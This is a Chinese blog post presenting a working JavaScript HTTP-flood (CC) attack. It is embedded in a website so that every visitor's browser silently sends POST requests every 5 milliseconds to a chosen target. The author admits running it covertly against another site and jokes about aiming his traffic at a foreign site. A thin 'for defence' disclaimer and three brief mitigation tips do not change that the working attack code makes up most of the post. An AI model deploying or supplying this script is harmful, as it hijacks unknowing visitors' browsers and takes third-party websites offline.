实现基于js的CC攻击+转移攻击

少羽.
少羽.
少羽.
418
文章
87
评论
2019年1月2日15:27:24 评论 11,223 1286字阅读4分17秒
广告也精彩

申明:此文不是为了教大家攻击别人网站,主要是为了学会更好的防御。
今天在群里跟一个朋友讨论到CC攻击,然后我就想到了百度的这么一个方法

假设今天我的官网遭受一百万的请求攻击,那么我就可以利用这一百万的PV,进行转换攻击

对方就要收到我的几百万次的攻击。

简单说cc攻击就是通过大量肉鸡模拟正常用户对网站某个需要获取大量数据的网页发送数据包,导致服务器崩溃。

其最重要的就是肉鸡,我网站一般都有上千人同时在线,于是他们都成为了我的“肉鸡”~

我写了一段攻击代码放我网站上,只要用户访问网站就会自动不断的通过ajax向指定页面发送post数据包,半个小时后对方网站基本over了。

当然,攻击的页面是我先选好了的需要获取数据量比较大的页面,这个很重要。

而且由于ajax跨域安全限制,发送数据包后浏览器是不会获取返回数据的,这样对当前访问的用户基本没有影响,跟正常访问没区别。

但缺点也是因为跨域限制,在IE下会弹出警告没有权限或需要授权,所以我在代码中if了ie浏览器下不执行函数。

如果你有pv大的shell的话这个不是问题,现在用非IE人已经很多了,我在忽略IE用户的情况下也只用了半个小时就o了。

下面是ajax攻击代码,间隔时间可以根据需要自己调整,我设置的是5毫秒一次。

<script type="text/javascript">

var t_postdata='id=cacacacacacacaca';//数据越大效果越好。

var t_url='http://www.xxx.com';//攻击目标

function c_xmlHttp()

{

        if(window.ActiveXObject)

        {

                xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');

        }

        else if(window.XMLHttpRequest)

        {

                xmlHttp=new XMLHttpRequest();

        }

        return xmlHttp;

}

function post_send()

{

        var xmlHttp=c_xmlHttp();

        xmlHttp.open("POST",t_url,true);

        xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

        xmlHttp.send(t_postdata);

        r_send();

}

function r_send()

{

        setTimeout("post_send()", 5);//5毫秒一次攻击

}

if(!+[1,])//IE下不执行。

{var fghj=1;}

else

{setTimeout("post_send()", 1000);}//访问访问用户1秒后开始执行
</script>

防御办法:

1,对数据量比较大的页面使用缓存,尽量减少数据库连接。

2,对每个访问者设置ip cookie,限制时段内访问次数。

3,对每个用户设置session,限制时段内访问次数。

总体来说非常实用的!比如说我的官网,每天都会被人攻击,几十万的浏览量,如果转到菲律宾官网呢?这就非常有意思了哈哈哈

继续阅读
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
广告也精彩
少羽.
  • 本文由 发表于 2019年1月2日15:27:24
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
nginx简易防CC策略规则 探索之路

nginx简易防CC策略规则

前几天一直在被某人的攻击,因为全是肉鸡代理攻击。 真实访问,宝塔防火墙屏蔽不了,只能是手动分析日志,进行拦截! 下面我放几条规则,大家可以进行参考。 因为在C我过程中,我D死了他几个腾讯云的机器。 1...
近日受到大量cc,排名全掉 关于本站

近日受到大量cc,排名全掉

是不是你们cc攻击多次,我没有说什么代表我很弱? 这次你们真的惹火我了,你们能打是吧!许多人给我说报警没用,我也没试过。 今天我就去报警看看到底有用没,所有记录我都会给警方,不信抓不住你。 我之前的确...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: